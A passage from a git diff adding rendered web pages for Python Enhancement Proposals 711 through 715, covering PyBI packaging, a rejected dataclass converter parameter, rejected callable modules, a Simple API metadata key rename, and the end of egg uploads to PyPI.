    Rationale: for traditional standalone python installers that are targeted +at end-users, you probably want to include at least pip, to avoid +bootstrapping issues (PEP 453). But pybis are different: they’re designed +to be installed by “smart” tooling, that consume the pybi as part of some +kind of larger automated deployment process. It’s easier for these installers +to start from a blank slate and then add whatever they need, than for them to +start with some preinstalled packages that they may or may not want. (And +besides, you can still run python -m ensurepip.)

    +
  • +
  • Include the full stdlib, except for test.

    Rationale: the top-level test module contains CPython’s own test +suite. It’s huge (CPython without test is ~37 MB, then test +adds another ~25 MB on top of that!), and essentially never used by +regular user code. Also, as precedent, the official nuget packages, +the official manylinux images, and multiple Linux distributions all +leave it out, and this hasn’t caused any major problems.

    +

    So this seems like the best way to balance broad compatibility with +reasonable download/install sizes.

    +
  • +
  • I’m not shipping any .pyc files. They take up space in the +download, can be generated on the final system at minimal cost, and +dropping them removes a source of location-dependence. (.pyc +files store the absolute path of the corresponding .py file and +include it in tracebacks; but, pybis are relocatable, so the correct +path isn’t known until after install.)
  • +
+
+
+
+

Backwards Compatibility

+

No backwards compatibility considerations.

+
+
+

Security Implications

+

No security implications, beyond the fact that anyone who takes it upon +themselves to distribute binaries has to come up with a plan to manage their +security (e.g., whether they roll a new build after an OpenSSL CVE drops). But +collectively, we core Python folks are already maintaining binary builds for all +major platforms (macOS + Windows through python.org, and Linux builds through +the official manylinux image), so even if we do start releasing official CPython +builds on PyPI it doesn’t really raise any new security issues.

+
+
+

How to Teach This

+

This isn’t targeted at end-users; their experience will simply be that e.g. +their pyenv or tox invocation magically gets faster and more reliable (if those +projects’ maintainers decide to take advantage of this PEP).

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0711.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0712/index.html b/pep-0712/index.html new file mode 100644 index 00000000000..48313bb6610 --- /dev/null +++ b/pep-0712/index.html @@ -0,0 +1,476 @@ + + + + + + + + PEP 712 – Adding a “converter” parameter to dataclasses.field | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 712 – Adding a “converter” parameter to dataclasses.field

+
+
Author:
+
Joshua Cannon <joshdcannon at gmail.com>
+
Sponsor:
+
Eric V. Smith <eric at trueblade.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Jan-2023
+
Python-Version:
+
3.13
+
Post-History:
+
27-Dec-2022, +19-Jan-2023, +23-Apr-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

The reasons for the 2024 Steering Council rejection include:

+
    +
  • We did not find evidence of a strong consensus that this feature was needed in the standard library, despite some proponents arguing in favor in order to reduce their dependence on third party packages. For those who need such functionality, we think those existing third party libraries such as attrs and Pydantic (which the PEP references) are acceptable alternatives.
  • +
  • This feature seems to us like an accumulation of what could be considered more cruft in the standard library, leading us ever farther away from the “simple” use cases that dataclasses are ideal for.
  • +
  • Reading the “How to Teach This” section of the PEP gives us pause that the pitfalls and gotchas are significant, with a heightened confusion and complexity outweighing any potential benefits.
  • +
  • The PEP seems more focused toward helping type checkers than people using the library.
  • +
+
+
+

Abstract

+

PEP 557 added dataclasses to the Python stdlib. PEP 681 added +dataclass_transform() to help type checkers understand +several common dataclass-like libraries, such as attrs, Pydantic, and object +relational mapper (ORM) packages such as SQLAlchemy and Django.

+

A common feature other libraries provide over the standard library +implementation is the ability for the library to convert arguments given at +initialization time into the types expected for each field using a +user-provided conversion function.

+

Therefore, this PEP adds a converter parameter to dataclasses.field() +(along with the requisite changes to dataclasses.Field and +dataclass_transform()) to specify the function to use to +convert the input value for each field to the representation to be stored in +the dataclass.

+
+
+

Motivation

+

There is no existing, standard way for dataclasses or third-party +dataclass-like libraries to support argument conversion in a type-checkable +way. To work around this limitation, library authors/users are forced to choose +to:

+
    +
  • Opt-in to a custom Mypy plugin. These plugins help Mypy understand the +conversion semantics, but not other tools.
  • +
  • Shift conversion responsibility onto the caller of the dataclass +constructor. This can make constructing certain dataclasses unnecessarily +verbose and repetitive.
  • +
  • Provide a custom __init__ which declares “wider” parameter types and +converts them when setting the appropriate attribute. This not only duplicates +the typing annotations between the converter and __init__, but also opts +the user out of many of the features dataclasses provides.
  • +
  • Provide a custom __init__ but without meaningful type annotations +for the parameter types requiring conversion.
  • +
+

None of these choices are ideal.

+
+
+

Rationale

+

Adding argument conversion semantics is useful and beneficial enough that most +dataclass-like libraries provide support. Adding this feature to the standard +library means more users are able to opt-in to these benefits without requiring +third-party libraries. Additionally third-party libraries are able to clue +type-checkers into their own conversion semantics through added support in +dataclass_transform(), meaning users of those libraries +benefit as well.

+
+
+

Specification

+
+

New converter parameter

+

This specification introduces a new parameter named converter to the +dataclasses.field() function. If provided, it represents a single-argument +callable used to convert all values when assigning to the associated attribute.

+

For frozen dataclasses, the converter is only used inside a dataclass-synthesized +__init__ when setting the attribute. For non-frozen dataclasses, the converter +is used for all attribute assignment (E.g. obj.attr = value), which includes +assignment of default values.

+

The converter is not used when reading attributes, as the attributes should already +have been converted.

+

Adding this parameter also implies the following changes:

+ +
+

Example

+
def str_or_none(x: Any) -> str | None:
+  return str(x) if x is not None else None
+
+@dataclasses.dataclass
+class InventoryItem:
+    # `converter` as a type (including a GenericAlias).
+    id: int = dataclasses.field(converter=int)
+    skus: tuple[int, ...] = dataclasses.field(converter=tuple[int, ...])
+    # `converter` as a callable.
+    vendor: str | None = dataclasses.field(converter=str_or_none))
+    names: tuple[str, ...] = dataclasses.field(
+      converter=lambda names: tuple(map(str.lower, names))
+    )  # Note that lambdas are supported, but discouraged as they are untyped.
+
+    # The default value is also converted; therefore the following is not a
+    # type error.
+    stock_image_path: pathlib.PurePosixPath = dataclasses.field(
+      converter=pathlib.PurePosixPath, default="assets/unknown.png"
+    )
+
+    # Default value conversion extends to `default_factory`;
+    # therefore the following is also not a type error.
+    shelves: tuple = dataclasses.field(
+      converter=tuple, default_factory=list
+    )
+
+item1 = InventoryItem(
+  "1",
+  [234, 765],
+  None,
+  ["PYTHON PLUSHIE", "FLUFFY SNAKE"]
+)
+# item1's repr would be (with added newlines for readability):
+#   InventoryItem(
+#     id=1,
+#     skus=(234, 765),
+#     vendor=None,
+#     names=('PYTHON PLUSHIE', 'FLUFFY SNAKE'),
+#     stock_image_path=PurePosixPath('assets/unknown.png'),
+#     shelves=()
+#   )
+
+# Attribute assignment also participates in conversion.
+item1.skus = [555]
+# item1's skus attribute is now (555,).
+
+
+
+
+
+

Impact on typing

+

A converter must be a callable that accepts a single positional argument, and +the parameter type corresponding to this positional argument provides the type +of the the synthesized __init__ parameter associated with the field.

+

In other words, the argument provided for the converter parameter must be +compatible with Callable[[T], X] where T is the input type for +the converter and X is the output type of the converter.

+
+

Type-checking default and default_factory

+

Because default values are unconditionally converted using converter, if +an argument for converter is provided alongside either default or +default_factory, the type of the default (the default argument if +provided, otherwise the return value of default_factory) should be checked +using the type of the single argument to the converter callable.

+
+
+

Converter return type

+

The return type of the callable must be a type that’s compatible with the +field’s declared type. This includes the field’s type exactly, but can also be +a type that’s more specialized (such as a converter returning a list[int] +for a field annotated as list, or a converter returning an int for a +field annotated as int | str).

+
+
+
+

Indirection of allowable argument types

+

One downside introduced by this PEP is that knowing what argument types are +allowed in the dataclass’ __init__ and during attribute assignment is not +immediately obvious from reading the dataclass. The allowable types are defined +by the converter.

+

This is true when reading code from source, however typing-related aides such +as typing.reveal_type and “IntelliSense” in an IDE should make it easy to know +exactly what types are allowed without having to read any source code.

+
+
+
+

Backward Compatibility

+

These changes don’t introduce any compatibility problems since they +only introduce opt-in new features.

+
+
+

Security Implications

+

There are no direct security concerns with these changes.

+
+
+

How to Teach This

+

Documentation and examples explaining the new parameter and behavior will be +added to the relevant sections of the docs site (primarily on +dataclasses) and linked from the What’s New document.

+

The added documentation/examples will also cover the “common pitfalls” that +users of converters are likely to encounter. Such pitfalls include:

+
    +
  • Needing to handle None/sentinel values.
  • +
  • Needing to handle values that are already of the correct type.
  • +
  • Avoiding lambdas for converters, as the synthesized __init__ +parameter’s type will become Any.
  • +
  • Forgetting to convert values in the bodies of user-defined __init__ in +frozen dataclasses.
  • +
  • Forgetting to convert values in the bodies of user-defined __setattr__ in +non-frozen dataclasses.
  • +
+

Additionally, potentially confusing pattern matching semantics should be covered:

+
@dataclass
+class Point:
+    x: int = field(converter=int)
+    y: int
+
+match Point(x="0", y=0):
+    case Point(x="0", y=0):  # Won't be matched
+        ...
+    case Point():  # Will be matched
+        ...
+    case _:
+        ...
+
+
+

However it’s worth noting this behavior is true of any type that does conversion +in its initializer, and type-checkers should be able to catch this pitfall:

+
match int("0"):
+  case int("0"):  # Won't be matched
+      ...
+  case _:  # Will be matched
+      ...
+
+
+
+
+

Reference Implementation

+

The attrs library already includes a converter +parameter exhibiting the same converter semantics (converting in the +initializer and on attribute setting) when using the @define class +decorator.

+

CPython support is implemented on a branch in the author’s fork.

+
+
+

Rejected Ideas

+
+

Just adding “converter” to typing.dataclass_transform’s field_specifiers

+

The idea of isolating this addition to +dataclass_transform() was briefly +discussed on Typing-SIG where it was suggested +to broaden this to dataclasses more generally.

+

Additionally, adding this to dataclasses ensures anyone can reap the +benefits without requiring additional libraries.

+
+
+

Not converting default values

+

There are pros and cons with both converting and not converting default values. +Leaving default values as-is allows type-checkers and dataclass authors to +expect that the type of the default matches the type of the field. However, +converting default values has three large advantages:

+
    +
  1. Consistency. Unconditionally converting all values that are assigned to the +attribute, involves fewer “special rules” that users must remember.
  2. +
  3. Simpler defaults. Allowing the default value to have the same type as +user-provided values means dataclass authors get the same conveniences as +their callers.
  4. +
  5. Compatibility with attrs. Attrs unconditionally uses the converter to +convert default values.
  6. +
+
+
+

Automatic conversion using the field’s type

+

One idea could be to allow the type of the field specified (e.g. str or +int) to be used as a converter for each argument provided. +Pydantic’s data conversion has semantics which +appear to be similar to this approach.

+

This works well for fairly simple types, but leads to ambiguity in expected +behavior for complex types such as generics. E.g. For tuple[int, ...] it is +ambiguous if the converter is supposed to simply convert an iterable to a tuple, +or if it is additionally supposed to convert each element type to int. Or +for int | None, which isn’t callable.

+
+
+

Deducing the attribute type from the return type of the converter

+

Another idea would be to allow the user to omit the attribute’s type annotation +if providing a field with a converter argument. Although this would +reduce the common repetition this PEP introduces (e.g. x: str = field(converter=str)), +it isn’t clear how to best support this while maintaining the current dataclass +semantics (namely, that the attribute order is preserved for things like the +synthesized __init__, or dataclasses.fields). This is because there isn’t +an easy way in Python (today) to get the annotation-only attributes interspersed +with un-annotated attributes in the order they were defined.

+

A sentinel annotation could be applied (e.g. x: FromConverter = ...), +however this breaks a fundamental assumption of type annotations.

+

Lastly, this is feasible if all fields (including those without a converter) +were assigned to dataclasses.field, which means the class’ own namespace +holds the order, however this trades repetition of type+converter with +repetition of field assignment. The end result is no gain or loss of repetition, +but with the added complexity of dataclasses semantics.

+

This PEP doesn’t suggest it can’t or shouldn’t be done. Just that it isn’t +included in this PEP.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0712.rst

+

Last modified: 2024-06-06 23:57:11 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0713/index.html b/pep-0713/index.html new file mode 100644 index 00000000000..395256927ca --- /dev/null +++ b/pep-0713/index.html @@ -0,0 +1,308 @@ + + + + + + + + PEP 713 – Callable Modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 713 – Callable Modules

+
+
Author:
+
Amethyst Reese <amethyst at n7.gg>
+
Sponsor:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
20-Apr-2023
+
Python-Version:
+
3.12
+
Post-History:
+
23-Apr-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

The Steering Council didn’t feel that there was a compelling reason to +have this PEP, even though it clearly could be done from a consistency +point of view. +If this idea comes up again in the future, this is a useful prior +discussion to refer to.

+
+
+

Abstract

+

Modules are currently not directly callable. Classes can define a __call__ +method that makes instance objects callable, but defining a similarly named +function in the global module scope has no effect, and that function can +only be called by importing or referencing it directly as module.__call__. +PEP 562 added support for __getattr__() and __dir__() for modules, but +defining __getattr__ to return a value for __call__ still does not +make a module callable.

+

This PEP proposes support for making modules directly callable by defining +a __call__ object in the module’s global namespace, either as a standard +function, or an arbitrary callable object.

+
+
+

Motivation

+

Many modules have only a single primary interface to their functionality. +In many cases, that interface is a single callable object, where being able +to import and use the module directly as a callable provides a more “Pythonic” +interface for users:

+
# user.py
+
+import fancy
+
+@fancy
+def func(...):
+    ...
+
+
+

Currently, providing this style of interface requires modifying the module +object at runtime to make it callable.

+

This is commonly done by replacing the module object in sys.modules with +a callable alternative (such as a function or class instance):

+
# fancy.py
+
+def fancy(...):
+    ...
+
+sys.modules[__name__] = fancy
+
+
+

This has the effect of making the original module effectively unreachable +without further hooks from the author, even with from module import member. +It also results in a “module” object that is missing all of the special module +attributes, including __doc__, __package__, __path__, etc.

+

Alternatively, a module author can choose to override the module’s __class__ +property with a custom type that provides a callable interface:

+
# fancy.py
+
+def fancy(...):
+    ...
+
+class FancyModule(types.ModuleType):
+    def __call__(self, ...):
+        return fancy(...)
+
+sys.modules[__name__].__class__ = FancyModule
+
+
+

The downside of either approach is that it not only results in extra +boilerplate, but also results in type checker failures because they don’t +recognize that the module is callable at runtime:

+
$ mypy user.py
+user.py:3: error: Module not callable  [operator]
+Found 1 error in 1 file (checked 1 source file)
+
+
+
+
+

Specification

+

When a module object is called, and a __call__ object is found (either +as the result of a __getattr__ or __dict__ lookup), then that object +will be called with the given arguments.

+

If a __call__ object is not found, then a TypeError will be raised, +matching the existing behavior.

+

All of these examples would be considered valid, callable modules:

+
# hello.py
+
+def __call__(...):
+    pass
+
+
+
# hello.py
+
+class Hello:
+    pass
+
+__call__ = Hello
+
+
+
# hello.py
+
+def hello():
+    pass
+
+def __getattr__(name):
+    if name == "__call__":
+        return hello
+
+
+

The first two styles should generally be preferred, as it allows for easier +static analysis from tools like type checkers, though the third form would be +allowed in order to make the implementation more consistent.

+

The intent is to allow arbitrary callable object to be assigned to the module’s +__call__ property or returned by the module’s __getattr__ method, +enabling module authors to pick the most suitable mechanism for making their +module callable by users.

+
+
+

Backwards Compatibility and Impact on Performance

+

This PEP is not expected to cause any backwards incompatibility. Any modules +that already contain a __call__ object will continue to function the same +as before, though with the additional ability to be called directly. It is +considered unlikely that modules with an existing __call__ object would +depend on the existing behavior of raising TypeError when called.

+

Performance implications of this PEP are minimal, as it defines a new interface. +Calling a module would trigger a lookup for the name __call__ on a module +object. Existing workarounds for creating callable modules already depend on +this behavior for generic objects, resulting in similar performance for these +callable modules.

+

Type checkers will likely need to be updated accordingly to treat modules with +a __call__ object as callable. This should be possible to support in type +checkers when checking code targeted at older Python versions that do not +support callable modules, with the expectation that these modules would also +include one of the workarounds mentioned earlier to make the module callable.

+
+
+

How to Teach This

+

The documentation for callable types will +include modules in the list, with a link to __call__(). +The Emulating callable objects documentation will include a section +covering callable modules, with example code, similar to the section for +customizing module attribute access.

+
+
+

Reference Implementation

+

The proposed implementation of callable modules is available in +CPython PR #103742.

+
+
+

Rejected Ideas

+

Given the introduction of __getattr__ and __dir__, and the proposal +to enable use of __call__, it was considered if it was worth allowing use +of all Special method names for modules, such as __or__ +and __iter__. While this would not be completely undesired, it increases +the potential for backward compatibility concerns, and these other special +methods are likely to provide less utility to library authors in comparison +to __call__.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0713.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0714/index.html b/pep-0714/index.html new file mode 100644 index 00000000000..067f1906c53 --- /dev/null +++ b/pep-0714/index.html @@ -0,0 +1,392 @@ + + + + + + + + PEP 714 – Rename dist-info-metadata in the Simple API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 714 – Rename dist-info-metadata in the Simple API

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
06-Jun-2023
+
Post-History:
+
06-Jun-2023
+
Resolution:
+
27-Jun-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP renames the metadata provided by PEP 658 in both HTML and JSON +formats of the Simple API and provides guidelines for both clients and servers +in how to handle the renaming.

+
+
+

Motivation

+

PEP 658 specified a mechanism to host the core metadata files from an +artifact available through the Simple API such that a client could fetch the +metadata and use it without having to download the entire artifact. Later +PEP 691 was written to add the ability to use JSON rather than HTML on the +Simple API, which included support for the PEP 658 metadata.

+

Unfortunately, PyPI did not support PEP 658 until just +recently, which released with +a bug where the +dist-info-metadata key from PEP 658 was incorrectly named in the JSON +representation, to be data-dist-info-metadata. However, when +attempting to fix that bug, it was discovered that pip also had a +bug, where any use of +dist-info-metadata in the JSON representation would cause pip to hard fail +with an exception.

+

The bug in pip has existed since at least v22.3, which means that it has +been released for approximately 8 months, long enough to have been pulled into +Python releases, downstream Linux releases, baked into containers, virtual +environments, etc.

+

This puts us in an awkward position of having a bug on PyPI that cannot be fixed +without breaking pip, due to a bug in pip, but that version of pip is old enough +to have been widely deployed. To make matters worse, a version of pip that is +broken in this way cannot install anything from PyPI once it fixes its bug, +including installing a new, fixed version of pip.

+
+
+

Rationale

+

There are 3 main options for a path forward for fixing these bugs:

+
    +
  1. Do not change the spec, fix the bug in pip, wait some amount of time, then +fix the bug in PyPI, breaking anyone using an unfixed pip such that they +cannot even install a new pip from PyPI.
  2. +
  3. Do the same as (1), but special case PyPI so it does not emit the PEP 658 +metadata for pip, even if it is available. This allows people to upgrade pip +if they’re on a broken version, but nothing else.
  4. +
  5. Change the spec to avoid the key that pip can’t handle currently, allowing +PyPI to emit that key and a new version of pip to be released to take +advantage of that key.
  6. +
+

This PEP chooses (3), but goes a little further and also renames the key in the +HTML representation.

+

Typically we do not change specs because of bugs that only affect one particular +implementation, unless the spec itself is at fault, which isn’t the case here: +the spec is fine and these are just genuine bugs in pip and PyPI.

+

However, we choose to do this for 4 reasons:

+
    +
  1. Bugs that affect pip and PyPI together represent an outsized amount of impact +compared to any other client or repository combination.
  2. +
  3. The impact of being broken is that installs do not function, at all, rather +than degrading gracefully in some way.
  4. +
  5. The feature that is being blocked by these bugs is of large importance to +the ability to quickly and efficiently resolve dependencies from PyPI with +pip, and having to delay it for a long period of time while we wait for the +broken versions of pip to fall out of use would be of detriment to the entire +ecosystem.
  6. +
  7. The downsides of changing the spec are fairly limited, given that we do not +believe that support for this is widespread, so it affects only a limited +number of projects.
  8. +
+
+
+

Specification

+

The keywords “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, +“SHALL NOT”, “SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, +and “OPTIONAL”” in this document are to be interpreted as described in +RFC 2119.

+
+

Servers

+

The PEP 658 metadata, when used in the HTML representation of the Simple API, +MUST be emitted using the attribute name data-core-metadata, with the +supported values remaining the same.

+

The PEP 658 metadata, when used in the PEP 691 JSON representation of the +Simple API, MUST be emitted using the key core-metadata, with the +supported values remaining the same.

+

To support clients that used the previous key names, the HTML representation +MAY also be emitted using the data-dist-info-metadata, and if it does +so it MUST match the value of data-core-metadata.

+
+
+

Clients

+

Clients consuming any of the HTML representations of the Simple API MUST +read the PEP 658 metadata from the key data-core-metadata if it is +present. They MAY optionally use the legacy data-dist-info-metadata if +it is present but data-core-metadata is not.

+

Clients consuming the JSON representation of the Simple API MUST read the +PEP 658 metadata from the key core-metadata if it is present. They +MAY optionally use the legacy dist-info-metadata key if it is present +but core-metadata is not.

+
+
+
+

Backwards Compatibility

+

There is a minor compatibility break in this PEP, in that clients that currently +correctly handle the existing metadata keys will not automatically understand +the newer metadata keys, but they should degrade gracefully, and simply act +as if the PEP 658 metadata does not exist.

+

Otherwise there should be no compatibility problems with this PEP.

+
+
+

Rejected Ideas

+
+

Leave the spec unchanged, and cope with fixing in PyPI and/or pip

+

We believe that the improvements brought by PEP 658 are very important to +improving the performance of resolving dependencies from PyPI, and would like to +be able to deploy it as quickly as we can.

+

Unfortunately the nature of these bugs is that we cannot deploy them as is +without breaking widely deployed and used versions of pip. The breakages in +this case would be bad enough that affected users would not even be able to +directly upgrade their version of pip to fix it, but would have to manually +fetch pip another way first (e.g. get-pip.py).

+

This is something that PyPI would be unwilling to do without some way to +mitigate those breakages for those users. Without some reasonable mitigation +strategy, we would have to wait until those versions of pip are no longer in use +on PyPI, which would likely be 5+ years from now.

+

There are a few possible mitigation strategies that we could use, but we’ve +rejected them as well.

+
+

Mitigation: Special Case pip

+

The breakages are particularly bad in that it prevents users from even upgrading +pip to get an unbroken version of pip, so a command like +pip install --upgrade pip would fail. We could mitigate this by having PyPI +special case pip itself, so that the JSON endpoint never returns the PEP 658 +metadata and the above still works.

+

This PEP rejects this idea because while the simple command that only upgrades +pip would work, if the user included anything else in that command to upgrade +then the command would go back to failing, which we consider to be still too +large of a breakage.

+

Additionally, while this bug happens to be getting exposed right now with PyPI, +it is really a bug that would happen with any PEP 691 repository that +correctly exposed the PEP 658 metadata. This would mean that every repository +would have to carry this special case for pip.

+
+
+

Mitigation: Have the server use User-Agent Detection

+

pip puts its version number into its User-Agent, which means that the server +could detect the version number and serve different responses based on that +version number so that we don’t serve the PEP 658 metadata to versions of pip +that are broken.

+

This PEP rejects this idea because supporting User-Agent detection is too +difficult to implement in a reasonable way.

+
    +
  1. On PyPI we rely heavily on caching the Simple API in our CDN. If we varied +the responses based on User-Agent, then our CDN cache would have an +explosion of cache keys for the same content, which would make it more likely +that any particular request would not be cached and fall back to hitting +our backend servers, which would have to scale much higher to support the +load.
  2. +
  3. PyPI could support the User-Agent detection idea by mutating the +Accept header of the request so that those versions appear to only +accept the HTML version, allowing us to maintain the CDNs cache keys. This +doesn’t affect any downstream caches of PyPI though, including pip’s HTTP +cache which would possibly have JSON versions cached for those requests and +we wouldn’t emit a Vary on User-Agent for them to know that it isn’t +acceptable to share those caches, and adding a Vary: User-Agent for +downstream caches would have the same problem as (1), but for downstream +caches instead of our CDN cache.
  4. +
  5. The pip bug ultimately isn’t PyPI specific, it affects any repository that +implements PEP 691 and PEP 658 together. This would mean that +workarounds that rely on implementation specific fixes have to be replicated +for each repository that implements both, which may not be easy or possible +in all cases (static mirrors may not be able to do this User-Agent +detection for instance).
  6. +
+
+
+
+

Only change the JSON key

+

The bug in pip only affects the JSON representation of the Simple API, so we only +need to actually change the key in the JSON, and we could leave the existing +HTML keys alone.

+

This PEP rejects doing that because we believe that in the long term, having +the HTML and JSON key names diverge would make mistakes like this more likely +and make implementing and understanding the spec more confusing.

+

The main reason that we would want to not change the HTML keys is to not lose +PEP 658 support in any HTML only clients or repositories that might already +support it. This PEP mitigates that breakage by allowing both clients and +servers to continue to support both keys, with a recommendation of when and +how to do that.

+
+
+
+

Recommendations

+

The recommendations in this section, other than this notice itself, are +non-normative, and represent what the PEP authors believe to be the best default +implementation decisions for something implementing this PEP, but it does not +represent any sort of requirement to match these decisions.

+
+

Servers

+

We recommend that servers only emit the newer keys, particularly for the JSON +representation of the Simple API since the bug itself only affected JSON.

+

Servers that wish to support PEP 658 in clients that use HTML and have it +implemented, can safely emit both keys only in HTML.

+

Servers should not emit the old keys in JSON unless they know that no broken +versions of pip will be used to access their server.

+
+
+

Clients

+

We recommend that clients support both keys, for both HTML and JSON, preferring +the newer key as this PEP requires. This will allow clients to support +repositories that already have correctly implemented PEP 658 and PEP 691 +but have not implemented this PEP.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0714.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0715/index.html b/pep-0715/index.html new file mode 100644 index 00000000000..ba1a6680e91 --- /dev/null +++ b/pep-0715/index.html @@ -0,0 +1,308 @@ + + + + + + + + PEP 715 – Disabling bdist_egg distribution uploads on PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 715 – Disabling bdist_egg distribution uploads on PyPI

+
+
Author:
+
William Woodruff <william at yossarian.net>
+
Sponsor:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
06-Jun-2023
+
Post-History:
+
09-Jun-2023
+
Resolution:
+
24-Jun-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP recommends deprecating and then disabling new uploads of the +bdist_egg distribution type on PyPI. In a parallel move, this PEP recommends +deprecating and then disabling new uploads of distribution filenames that have +the .egg suffix.

+

After this PEP, PyPI will only accept new uploads of the sdist +and bdist_wheel types, corresponding to files with .tar.gz/.zip and +.whl suffixes respectively.

+

This PEP does not recommend removing or otherwise affecting any previously +uploaded bdist_egg distributions or files with the .egg suffix.

+
+
+

Rationale

+
+

Previous Work

+

The groundwork for this proposal was established with PEP 527, which +proposed deprecating and eventually removing upload support for a handful +of un(der)used file extensions and distribution types.

+

In particular, PEP 527 proposed the removal of the bdist_dumb, +bdist_rpm, bdist_dmg, bdist_msi, and bdist_wininst distribution +types, as well as the .tar, .tar.bz2, .tar.xz, .tar.Z, +.tgz, and .tbz file extensions on distribution filenames.

+

PEP 527 was fully enacted with +PR #7529 to Warehouse, +which was merged on 13 April 2020.

+
+
+

The bdist_egg format

+

The bdist_egg filetype identifies distributions in the +egg format. The +egg format was introduced by setuptools in 2004 and is roughly equivalent +in functionality to the +wheel format +first introduced by PEP 427 in 2012 +as the standardized format +for built distributions.

+

Despite its longevity, the egg format has had +limited adoption on PyPI. +Some observations from that issue:

+
    +
  • In the month of May 2023, bdist_egg uploads accounted for 0.2% of all +distribution uploads to PyPI;
  • +
  • pip deprecated its --egg option in 2016;
  • +
  • setuptools has considered egg support deprecated since 2019;
  • +
  • build only supports the sdist and bdist_wheel filetypes.
  • +
+

Given the above, this PEP proposes the removal of the bdist_egg format +under the same justifications presented in PEP 527, namely:

+
    +
  • Egg distributions are of limited use to the broader ecosystem and +therefore represent a non-reciprocal maintenance burden;
  • +
  • Having an additional built distribution format +is confusing to end users, who may +mistakenly pick it over the wheel format;
  • +
+

This PEP additionally offers an argument for removal rooted in +standardization and duplication: the egg format is not standardized by any +PEP or other community standard, and overlaps heavily with its standardized +and well-supported alternative (wheel).

+
+
+

The .egg file extension

+

The .egg file extension is used exclusively for distributions of the +bdist_egg format. As such, it serves no purpose in a scenario where +PyPI disables new distribution uploads for bdist_egg distributions.

+
+
+
+

Removal Process

+

This PEP does NOT propose removing any existing files from PyPI, only +disallowing new ones from being uploaded.

+

PyPI will provide a deprecation period of one month. At the beginning +of the deprecation period, maintainers of projects that have uploaded one or +more egg distributions since 1 Jan 2023 will receive a one-time email informing +them of the upcoming end of support for egg distribution uploads.

+

During the deprecation period, users will continue to be allowed to upload egg +distributions to new and existing projects. Uploading an egg distribution +during this period will also send all maintainers of the project +a similar email as above, reminding them of the upcoming end of support.

+

After the deprecation period, support for uploading egg distributions will +cease to exist on PyPI.

+
+

Prior Art

+

The removal process above was based on that of PEP 527, with the following +changes:

+
    +
  • All projects will be continue to be allowed to upload eggs +during the deprecation period, not just those that have done so previously.
  • +
  • Uploading an egg during the deprecation period will also trigger an email +to maintainers, in addition to the one-time email at the beginning.
  • +
+
+
+
+

Backwards Compatibility

+
+

Limited Impact

+

As noted in the rationale section, this PEP is expected to have no impact +on the overwhelming majority of PyPI users and projects, and there has been +substantial community coordination +over the past 1 1/2 years to minimize the impact on the few last use cases.

+
+
+

Hosted Files

+

This PEP does NOT propose the removal of any egg distributions that have +already been uploaded to PyPI. All previously uploaded egg distributions will +remain downloadable, ensuring that existing users will continue to be able +to download them.

+
+
+

Deprecation Period

+

This PEP uses the removal process documented above, which specifies +a deprecation period of 1 month for projects that have previously uploaded +egg distributions to PyPI.

+

After the end of the deprecation period, support for uploading new egg +distributions will cease to exist on PyPI.

+
+
+
+

Security Implications

+

This PEP does not identify any positive or negative security implications +associated with removing upload support for egg distributions.

+
+
+

How To Teach This

+

As part of the removal process, PyPI will send emails to all maintainers of +projects that have previously uploaded egg distributions in 2023.

+

Additionally, PyPI will write a post on the +PyPI blog that publicly announces the deprecation +period’s start and end.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0715.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
